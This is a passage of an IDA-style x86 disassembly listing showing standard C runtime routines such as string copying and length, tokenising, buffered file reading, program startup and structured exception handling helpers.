test esi, 3
jnz short loc_40393C
mov ebx, ecx
shr ecx, 2
jnz short loc_4039BF
loc_40395E: ; CODE XREF: sub_403910+AD�j
and ebx, 3
jz short loc_403976
loc_403963: ; CODE XREF: sub_403910+2A�j
; sub_403910+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_4039A8
sub ebx, 1
jnz short loc_403963
loc_403976: ; CODE XREF: sub_403910+39�j
; sub_403910+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40397E: ; CODE XREF: sub_403910+3D�j
test edi, 3
jz short loc_40399C
loc_403986: ; CODE XREF: sub_403910+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_403A2C
test edi, 3
jnz short loc_403986
loc_40399C: ; CODE XREF: sub_403910+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_403A17
loc_4039A3: ; CODE XREF: sub_403910+9B�j
; sub_403910+116�j
mov [edi], al
add edi, 1
loc_4039A8: ; CODE XREF: sub_403910+5F�j
sub ebx, 1
jnz short loc_4039A3
pop ebx
pop esi
loc_4039AF: ; CODE XREF: sub_403910+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4039B5: ; CODE XREF: sub_403910+C7�j
; sub_403910+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_40395E
loc_4039BF: ; CODE XREF: sub_403910+24�j
; sub_403910+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4039B5
test dl, dl
jz short loc_403A09
test dh, dh
jz short loc_4039FF
test edx, 0FF0000h
jz short loc_4039F5
test edx, 0FF000000h
jnz short loc_4039B5
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039F5: ; CODE XREF: sub_403910+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039FF: ; CODE XREF: sub_403910+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_403A09: ; CODE XREF: sub_403910+CB�j
xor edx, edx
mov [edi], edx
loc_403A0D: ; CODE XREF: sub_403910+E3�j
; sub_403910+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_403A23
loc_403A17: ; CODE XREF: sub_403910+91�j
xor eax, eax
loc_403A19: ; CODE XREF: sub_403910+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_403A19
loc_403A23: ; CODE XREF: sub_403910+105�j
and ebx, 3
jnz loc_4039A3
loc_403A2C: ; CODE XREF: sub_403910+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_403910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A34 proc near ; CODE XREF: sub_417676+1D�p
; sub_417676+5A�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_2C], eax
call sub_40539D
push 8
pop ecx
mov [ebp+var_28], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_403A65: ; CODE XREF: sub_403A34+4A�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_403A65
mov edx, [ebp+var_2C]
test edx, edx
jnz short loc_403A94
mov eax, [ebp+var_28]
mov edx, [eax+18h]
jmp short loc_403A94
; ---------------------------------------------------------------------------
loc_403A8F: ; CODE XREF: sub_403A34+77�j
test al, al
jz short loc_403AAD
inc edx
loc_403A94: ; CODE XREF: sub_403A34+51�j
; sub_403A34+59�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_403A8F
loc_403AAD: ; CODE XREF: sub_403A34+5D�j
mov ebx, edx
jmp short loc_403AC9
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A34+98�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_403AD0
inc edx
loc_403AC9: ; CODE XREF: sub_403A34+7B�j
cmp byte ptr [edx], 0
jnz short loc_403AB1
jmp short loc_403AD4
; ---------------------------------------------------------------------------
loc_403AD0: ; CODE XREF: sub_403A34+92�j
mov byte ptr [edx], 0
inc edx
loc_403AD4: ; CODE XREF: sub_403A34+9A�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
pop edi
and eax, ebx
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_403A34 endp
; =============== S U B R O U T I N E =======================================
sub_403AF3 proc near ; CODE XREF: sub_41B3D0+70�p
; sub_41B3D0+160�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_403B1A
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_403B1A: ; CODE XREF: sub_403AF3+9�j
mov eax, [eax+0Ch]
and eax, 10h
pop esi
retn
sub_403AF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B22 proc near ; CODE XREF: sub_403CB8+A1�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
jz loc_403C72
cmp [ebp+arg_C], 0
jz loc_403C72
imul edi, [ebp+arg_C]
mov esi, [ebp+arg_10]
test word ptr [esi+0Ch], 10Ch
mov [ebp+var_10], edi
mov ebx, edi
jz short loc_403B68
mov eax, [esi+18h]
mov [ebp+var_C], eax
jmp short loc_403B6F
; ---------------------------------------------------------------------------
loc_403B68: ; CODE XREF: sub_403B22+3C�j
mov [ebp+var_C], 1000h
loc_403B6F: ; CODE XREF: sub_403B22+44�j
test edi, edi
jz loc_403C3E
loc_403B77: ; CODE XREF: sub_403B22+116�j
test word ptr [esi+0Ch], 10Ch
jz short loc_403BC0
mov eax, [esi+4]
test eax, eax
jz short loc_403BC0
jl loc_403CA3
cmp ebx, eax
mov edi, ebx
jb short loc_403B94
mov edi, eax
loc_403B94: ; CODE XREF: sub_403B22+6E�j
cmp edi, [ebp+var_4]
ja loc_403C43
push edi
push dword ptr [esi]
push [ebp+var_4]
push [ebp+var_8]
call sub_402F72
sub [esi+4], edi
add [esi], edi
add [ebp+var_8], edi
sub ebx, edi
add esp, 10h
sub [ebp+var_4], edi
mov edi, [ebp+var_10]
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403BC0: ; CODE XREF: sub_403B22+5B�j
; sub_403B22+62�j
cmp ebx, [ebp+var_C]
jb short loc_403C0E
cmp [ebp+var_C], 0
mov eax, ebx
jz short loc_403BD6
xor edx, edx
div [ebp+var_C]
mov eax, ebx
sub eax, edx
loc_403BD6: ; CODE XREF: sub_403B22+A9�j
cmp eax, [ebp+var_4]
ja loc_403C79
push eax
push [ebp+var_8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
test eax, eax
jz loc_403CB2
cmp eax, 0FFFFFFFFh
jz loc_403CA3
add [ebp+var_8], eax
sub ebx, eax
sub [ebp+var_4], eax
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403C0E: ; CODE XREF: sub_403B22+A1�j
push esi
call sub_409C8D
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_403CA7
cmp [ebp+var_4], 0
jz short loc_403C79
mov ecx, [ebp+var_8]
inc [ebp+var_8]
mov [ecx], al
mov eax, [esi+18h]
dec ebx
dec [ebp+var_4]
mov [ebp+var_C], eax
loc_403C36: ; CODE XREF: sub_403B22+9C�j
; sub_403B22+EA�j
test ebx, ebx
jnz loc_403B77
loc_403C3E: ; CODE XREF: sub_403B22+4F�j
mov eax, [ebp+arg_C]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403C43: ; CODE XREF: sub_403B22+75�j
xor esi, esi
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C5A
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C5A: ; CODE XREF: sub_403B22+127�j
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 22h
push esi
loc_403C6A: ; CODE XREF: sub_403B22+17F�j
call sub_402F39
add esp, 14h
loc_403C72: ; CODE XREF: sub_403B22+1A�j
; sub_403B22+24�j
xor eax, eax
loc_403C74: ; CODE XREF: sub_403B22+11F�j
; sub_403B22+18E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403C79: ; CODE XREF: sub_403B22+B7�j
; sub_403B22+100�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C8F
push [ebp+arg_4]
push 0
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C8F: ; CODE XREF: sub_403B22+15B�j
call sub_4057D3
mov dword ptr [eax], 22h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp short loc_403C6A
; ---------------------------------------------------------------------------
loc_403CA3: ; CODE XREF: sub_403B22+64�j
; sub_403B22+DC�j
or dword ptr [esi+0Ch], 20h
loc_403CA7: ; CODE XREF: sub_403B22+F6�j
; sub_403B22+194�j
mov eax, edi
sub eax, ebx
xor edx, edx
div [ebp+arg_8]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403CB2: ; CODE XREF: sub_403B22+D3�j
or dword ptr [esi+0Ch], 10h
jmp short loc_403CA7
sub_403B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CB8 proc near ; CODE XREF: sub_403D7F+12�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push 0Ch
push 50D64Eh
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
mov ebx, [ebp+arg_8]
cmp ebx, esi
jz short loc_403CFB
mov edi, [ebp+arg_C]
cmp edi, esi
jz short loc_403CFB
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jnz short loc_403D03
loc_403CE3: ; CODE XREF: sub_403CB8+7A�j
; sub_403CB8+88�j
call sub_4057D3
mov dword ptr [eax], 16h
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
loc_403CFB: ; CODE XREF: sub_403CB8+16�j
; sub_403CB8+1D�j
xor eax, eax
loc_403CFD: ; CODE XREF: sub_403CB8+BB�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403D03: ; CODE XREF: sub_403CB8+29�j
cmp [ebp+arg_10], esi
jz short loc_403D13
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp edi, eax
jbe short loc_403D42
loc_403D13: ; CODE XREF: sub_403CB8+4E�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403D28
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403D28: ; CODE XREF: sub_403CB8+5F�j
xor eax, eax
cmp [ebp+arg_10], esi
setnz al
cmp eax, esi
jz short loc_403CE3
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp eax, edi
sbb eax, eax
inc eax
jz short loc_403CE3
loc_403D42: ; CODE XREF: sub_403CB8+59�j
push [ebp+arg_10]
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_10]
push edi
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403B22
add esp, 14h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403D75
mov eax, [ebp+var_1C]
jmp short loc_403CFD
sub_403CB8 endp
; =============== S U B R O U T I N E =======================================
sub_403D75 proc near ; CODE XREF: sub_403CB8+B3�p
; DATA XREF: seg001:00421400�o
push dword ptr [ebp+18h]
call sub_4081AD
pop ecx
retn
sub_403D75 endp
; =============== S U B R O U T I N E =======================================
sub_403D7F proc near ; CODE XREF: sub_41B3D0+D6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push 0FFFFFFFFh
push [esp+10h+arg_0]
call sub_403CB8
add esp, 14h
retn
sub_403D7F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403DA0 proc near ; CODE XREF: sub_41A9DE+59E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp ds:dword_433C78, 0
jz sub_40A6EF
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_403DD4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_403DD4: ; CODE XREF: sub_403DA0+23�j
lea esp, [esp+8]
jnz sub_40A6EF
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_41D3A0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_41D3C0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_403E62
cmp eax, 0BFFh
jl short loc_403E9A
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_403E33
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E33: ; CODE XREF: sub_403DA0+86�j
; sub_403DA0+E1�j
ucomisd xmm7, xmm7
jnp short loc_403E5D
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_40A42B
add esp, 10h
loc_403E5D: ; CODE XREF: sub_403DA0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E62: ; CODE XREF: sub_403DA0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_403EA1
cmp eax, 432h
jg short loc_403E33
andpd xmm0, oword ptr ds:oword_41D390
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E9A: ; CODE XREF: sub_403DA0+7B�j
fld ds:dbl_41D3D0
retn
; ---------------------------------------------------------------------------
loc_403EA1: ; CODE XREF: sub_403DA0+DA�j
cmppd xmm3, oword ptr ds:oword_41D3B0, 6
andpd xmm3, oword ptr ds:oword_41D390
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_403DA0 endp
; =============== S U B R O U T I N E =======================================
sub_403EBD proc near ; CODE XREF: sub_403ECE�j
; sub_4102B0+35�p
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_40A9EB
add esp, 0Ch
retn
sub_403EBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403ECE proc near ; CODE XREF: sub_401F1C+11C�p
; sub_401F1C+128�p ...
jmp sub_403EBD
sub_403ECE endp
; =============== S U B R O U T I N E =======================================
sub_403ED3 proc near ; CODE XREF: seg000:00403F78�p
; seg000:00404015�p ...
arg_0 = dword ptr 4
cmp ds:dword_425A9C, 1
jnz short loc_403EE1
call sub_409C54
loc_403EE1: ; CODE XREF: sub_403ED3+7�j
push [esp+arg_0]
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
retn
sub_403ED3 endp
; =============== S U B R O U T I N E =======================================
sub_403EF7 proc near ; CODE XREF: seg000:00403FFD�p
cmp word ptr ds:400000h, 5A4Dh
jnz short loc_403F35
mov eax, ds:40003Ch
cmp dword ptr [eax+400000h], 4550h
jnz short loc_403F35
cmp word ptr [eax+400018h], 10Bh
jnz short loc_403F35
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_403F35
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403F35: ; CODE XREF: sub_403EF7+9�j
; sub_403EF7+1A�j ...
xor eax, eax
retn
sub_403EF7 endp
; ---------------------------------------------------------------------------
loc_403F38: ; CODE XREF: seg000:0040411D�j
push 60h
push offset dword_421408
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call ds:dword_41D1A8
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, ds:dword_41D100
call ebx
push eax
call ds:dword_41D114
mov esi, eax
test esi, esi
jnz short loc_403F83
push 12h
call sub_403ED3
pop ecx
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403F83: ; CODE XREF: seg000:00403F74�j
mov [esi], edi
push esi
call ds:dword_41D068
push esi
push 0
test eax, eax
jnz short loc_403FA1
call ebx
push eax
call ds:dword_41D10C
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403FA1: ; CODE XREF: seg000:00403F91�j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx
push eax
call ds:dword_41D10C
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_403FD3
or edi, 8000h
loc_403FD3: ; CODE XREF: seg000:00403FCB�j
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov ds:dword_425F78, esi
mov ds:dword_425F80, eax
mov ds:dword_425F84, ecx
mov ds:dword_425F88, edx
mov ds:dword_425F7C, edi
call sub_403EF7
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
push ebx
call sub_405A83
pop ecx
test eax, eax
jnz short loc_40401B
push 1Ch
call sub_403ED3
pop ecx
loc_40401B: ; CODE XREF: seg000:00404011�j
call sub_4054D6
test eax, eax
jnz short loc_40402C
push 10h
call sub_403ED3
pop ecx
loc_40402C: ; CODE XREF: seg000:00404022�j
call sub_40B042
mov [ebp-4], ebx
call sub_4087E0
test eax, eax
jge short loc_404045
push 1Bh
call sub_40785D
pop ecx
loc_404045: ; CODE XREF: seg000:0040403B�j
call ds:dword_41D1A4
mov ds:dword_434DF8, eax
call sub_40AF0D
mov ds:dword_425A94, eax
call sub_40AE54
test eax, eax
jge short loc_40406B
push 8
call sub_40785D
pop ecx
loc_40406B: ; CODE XREF: seg000:00404061�j
call sub_40ABE1
test eax, eax
jge short loc_40407C
push 9
call sub_40785D
pop ecx
loc_40407C: ; CODE XREF: seg000:00404072�j
push ebx
call sub_407979
pop ecx
test eax, eax
jz short loc_40408E
push eax
call sub_40785D
pop ecx
loc_40408E: ; CODE XREF: seg000:00404085�j
call sub_40AB84
test [ebp-44h], bl
jz short loc_40409E
movzx ecx, word ptr [ebp-40h]
jmp short loc_4040A1
; ---------------------------------------------------------------------------
loc_40409E: ; CODE XREF: seg000:00404096�j
push 0Ah
pop ecx
loc_4040A1: ; CODE XREF: seg000:0040409C�j
push ecx
push eax
push 0
push 400000h
call loc_41BBE3
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040BE
push eax
call sub_407AD9
loc_4040BE: ; CODE XREF: seg000:004040B6�j
call sub_407AFB
jmp short loc_4040F3
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_40AA15
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040EE
push eax
call sub_407AEA
loc_4040EE: ; CODE XREF: seg000:004040E6�j
call sub_407B0A
loc_4040F3: ; CODE XREF: seg000:004040C3�j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_404112
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
loc_40410D: ; CODE XREF: seg000:00403F7E�j
; seg000:00403F9C�j
mov eax, 0FFh
loc_404112: ; CODE XREF: seg000:004040FD�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
call sub_40B08A
jmp loc_403F38
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404130 proc near ; CODE XREF: sub_402C0C+16�p
; sub_402C72+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_404160
loc_40413C: ; CODE XREF: sub_404130+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_404193
test ecx, 3
jnz short loc_40413C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_404160: ; CODE XREF: sub_404130+A�j
; sub_404130+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_404160
mov eax, [ecx-4]
test al, al
jz short loc_4041B1
test ah, ah
jz short loc_4041A7
test eax, 0FF0000h
jz short loc_40419D
test eax, 0FF000000h
jz short loc_404193
jmp short loc_404160
; ---------------------------------------------------------------------------
loc_404193: ; CODE XREF: sub_404130+13�j
; sub_404130+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40419D: ; CODE XREF: sub_404130+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041A7: ; CODE XREF: sub_404130+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041B1: ; CODE XREF: sub_404130+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_404130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041BB proc near ; CODE XREF: sub_40121E+58�p
; sub_40150F+F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41D3D8
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_4041EE
test byte ptr [eax], 8
jz short loc_4041EE
mov [ebp+var_C], 1994000h
loc_4041EE: ; CODE XREF: sub_4041BB+25�j
; sub_4041BB+2A�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_41D1AC
leave
retn 8
sub_4041BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404205 proc near ; CODE XREF: sub_40B8A9+65�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov ebp, [ebp+var_4]
mov esp, [ebx-4]
jmp eax
sub_404205 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_404235 proc near ; CODE XREF: sub_40B3C2+31�p
; sub_40B818+59�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_404235 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40423C proc near ; CODE XREF: sub_4043C9+69�p
; sub_40B8A9:loc_40B8D1�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_404265
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_413976
loc_404265: ; DATA XREF: sub_40423C+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_40423C endp
; ---------------------------------------------------------------------------
loc_40428E: ; CODE XREF: seg000:0041C1E9�j
; seg000:0041C204�j ...
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40BD75
add esp, 20h
mov [ebp-8], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4042C4: ; DATA XREF: sub_40456E+24�o
push esi
cld
mov esi, [esp+0Ch]
mov ecx, [esi+8]
xor ecx, esi
call sub_402710
push 0
push esi
push dword ptr [esi+14h]
push dword ptr [esi+0Ch]
push 0
push dword ptr [esp+24h]
push dword ptr [esi+10h]
push dword ptr [esp+24h]
call sub_40BD75
add esp, 20h
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042F4 proc near ; CODE XREF: sub_4043C9+81�p
; sub_40B915+53�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_404316
mov eax, offset loc_40439D
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_4043C6
; ---------------------------------------------------------------------------
loc_404316: ; CODE XREF: sub_4042F4+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4043C9
mov eax, ds:dword_423064
lea ecx, [ebp+var_28]
xor eax, ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_38], 1
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov eax, [ebp+arg_8]
mov [ebp+var_30], eax
call sub_40539D
mov eax, [eax+80h]
mov [ebp+var_2C], eax
lea eax, [ebp+var_34]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call [ebp+var_2C]
pop ecx
pop ecx
and [ebp+var_38], 0
loc_40439D: ; DATA XREF: sub_4042F4+10�o
cmp [ebp+var_4], 0
jz short loc_4043BA
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4043C3
; ---------------------------------------------------------------------------
